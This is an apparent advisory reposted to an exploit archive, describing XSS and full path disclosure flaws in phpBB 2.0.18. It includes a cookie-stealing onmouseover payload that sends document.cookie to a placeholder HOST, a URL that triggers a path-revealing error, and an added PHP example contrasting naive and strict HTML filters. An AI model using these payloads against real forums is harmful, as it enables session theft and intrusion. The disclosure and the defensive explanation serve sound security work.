
phpBB2018.txt
Posted Dec 27, 2005
Authored by Maksymilian Arciemowicz | Site securityreason.com

phpBB 2.0.18 is susceptible to cross site scripting and path disclosure issues.

tags | exploit, xss
SHA-256 | e1df557dc552d0f29527c2970c4b3bd38e24684dc6429892295fcf7bbdeab84d


[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM

--- 0. Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source
bulletin board package. phpBB has a user-friendly interface, a simple and
straightforward administration panel, and a helpful FAQ. Based on the powerful
PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or
Access/ODBC database servers, phpBB is the ideal free community solution for
all web sites.
Contact the authors at http://www.phpbb.com/about.php.

--- 1. XSS ---
If "Allowed HTML tags" is set to ON in phpBB (for example b, i, u, pre) and
your profile has "Always allow HTML: YES", or you are posting as a Guest,
then you can use tags like this:

<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>

Exploit:

<B C=">"
onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)"
X="<B "> H A L O </B>

and you receive the cookies.
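Why the payload above works, as an added example that is not phpBB's code or the advisory author's: a filter that only checks the tag name against the allow list (hypothetical naive_filter below) is confused by the quote in C=">" and the second "<B" inside X="<B ", while a filter that escapes everything and restores only bare, attribute-free tags (hypothetical strict_filter) keeps the event handler out. The payload is the constructed sample from section 1.

```php
<?php
// Added example, not phpBB code. Contrasts a tag-name-only allow list with a
// filter that re-enables only bare <b>, <i>, <u>, <pre> tags without attributes.

$allowed = array('b', 'i', 'u', 'pre');

// Constructed sample: the attribute-smuggling payload from section 1.
$payload = '<B C=">" onmouseover="alert(\'SecurityReason.Com\')" X="<B "> H E L O </B>';

// Naive filter: a tag is "a name followed by anything up to the next >".
// The > inside C=">" ends the first match early, the rest of the line passes
// through as plain text, and X="<B " starts a second "allowed" tag. The browser
// then parses the pieces as one <B> element carrying an onmouseover handler.
function naive_filter($html, $allowed)
{
    return preg_replace_callback(
        '#<(/?)([a-z0-9]+)[^>]*>#i',
        function ($m) use ($allowed) {
            return in_array(strtolower($m[2]), $allowed)
                ? $m[0]
                : htmlspecialchars($m[0], ENT_QUOTES);
        },
        $html
    );
}

// Strict filter: escape everything first, then restore only exact, bare,
// attribute-free tags from the allow list. Anything with an attribute stays escaped.
function strict_filter($html, $allowed)
{
    $out = htmlspecialchars($html, ENT_QUOTES);
    foreach ($allowed as $tag) {
        $out = preg_replace(
            '#&lt;(/?)' . preg_quote($tag, '#') . '&gt;#i',
            '<$1' . $tag . '>',
            $out
        );
    }
    return $out;
}

$naive  = naive_filter($payload, $allowed);
$strict = strict_filter($payload, $allowed);

echo "naive : $naive\n";   // unchanged: the onmouseover handler survives
echo "strict: $strict\n";  // opening tag fully escaped, only the bare </B> restored
```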

--- 2. Full Path Disclosure ---
In the file admin/admin_disallow.php, lines 25-31, there is:

--- 25-31 ---
if( !empty($setmodules) )
{
    $filename = basename(__FILE__);
    $module['Users']['Disallow'] = append_sid($filename);

    return;
}
--- 25-31 ---

The function append_sid() is not defined at that point when the file is called directly. So if you have:

register_globals = On
display_errors = On

then, with register_globals on, the query parameter becomes $setmodules and the guarded block runs. Request:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

--- RESULT ERROR ---
Fatal error: Call to undefined function: append_sid()
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
--- RESULT ERROR ---

--- 3. Greets ---
sp3x

--- 4. Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM